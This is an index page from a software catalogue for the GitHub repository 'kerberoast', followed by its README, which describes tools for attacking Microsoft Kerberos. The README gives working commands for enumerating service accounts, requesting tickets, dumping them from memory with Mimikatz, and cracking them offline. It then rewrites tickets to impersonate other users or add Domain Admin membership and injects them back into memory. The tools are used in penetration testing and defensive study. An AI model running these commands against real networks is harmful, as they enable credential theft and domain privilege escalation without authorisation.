Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/nidem/kerberoast
https://github.com/nidem/kerberoast
Last synced: about 1 month ago
JSON representation
- Host: GitHub
- URL: https://github.com/nidem/kerberoast
- Owner: nidem
- License: apache-2.0
- Created: 2014-09-22T14:46:49.000Z (about 10 years ago)
- Default Branch: master
- Last Pushed: 2022-12-31T17:17:28.000Z (almost 2 years ago)
- Last Synced: 2024-08-02T09:28:58.101Z (4 months ago)
- Language: Python
- Size: 69.3 KB
- Stars: 1,377
- Watchers: 67
- Forks: 314
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-hacking-lists - nidem/kerberoast - (Python)
README
kerberoast
==========Kerberoast is a series of tools for attacking MS Kerberos implementations. Below is a brief overview of what each tool does.
Extract all accounts in use as SPN using built in MS tools
----------------------------------------------------------
```
PS C:\> setspn -T medin -Q */*
```Request Ticket(s)
-----------------
One ticket:
```
PS C:\> Add-Type -AssemblyName System.IdentityModel
PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"
```All the tickets
```
PS C:\> Add-Type -AssemblyName System.IdentityModel
PS C:\> setspn.exe -T medin.local -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
```Extract the acquired tickets from ram with Mimikatz
---------------------------------------------------
```
mimikatz # kerberos::list /export
```Crack with tgsrepcrack
----------------------
```
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
```Rewrite
-------
Make user appear to be a different user
```
./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -u 500
```Add user to another group (in this case Domain Admin)
```
./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -g 512
```
Inject back into RAM with Mimikatz
----------------------------------
```
kerberos::ptt sql.kirbi
```